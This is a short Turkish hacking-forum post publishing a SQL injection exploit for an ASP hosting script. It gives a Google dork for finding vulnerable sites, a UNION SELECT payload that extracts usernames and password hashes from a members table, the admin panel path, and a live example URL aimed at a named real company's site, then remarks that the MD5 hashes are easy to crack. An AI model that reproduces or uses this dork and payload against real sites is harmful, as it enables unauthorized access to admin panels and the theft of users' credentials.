Hosting ASP Script SQL İnjection

Author : SaruHan 

Google Dork : default.asp?fox=duyuru

Site Sonuna : union+select+0,kullaniciadi,sifre,3,4+from+uyeler

Sitelerin Paneli : siteadi.com/yonetim/

 Örnek : http://www.kolcuogluyazilim.com/default.asp?fox=duyuru&oku=11%20union+select+0,kullaniciadi,sifre,3,4+from+uyeler 

 http://www.kolcuogluyazilim.com/yonetim/ 

 Arkadaşlar Açığı Dün Gece 1 de Host Siparişi Verirken Siteyi Karıştırıyordum Buldum. Açığı Başka Bir Forumda veya Milw0rmda Gören Varsa Konu Altında Mutlaka Yazsın. Açığımızda Zor Olan Tek Kısım Md5 lerin Kırılması Sağlam Bir Programınız Varsa Kırmakda Zorlanmazsınız Fazla. Bir Sql İnjection Hack Yöntemide Bu :)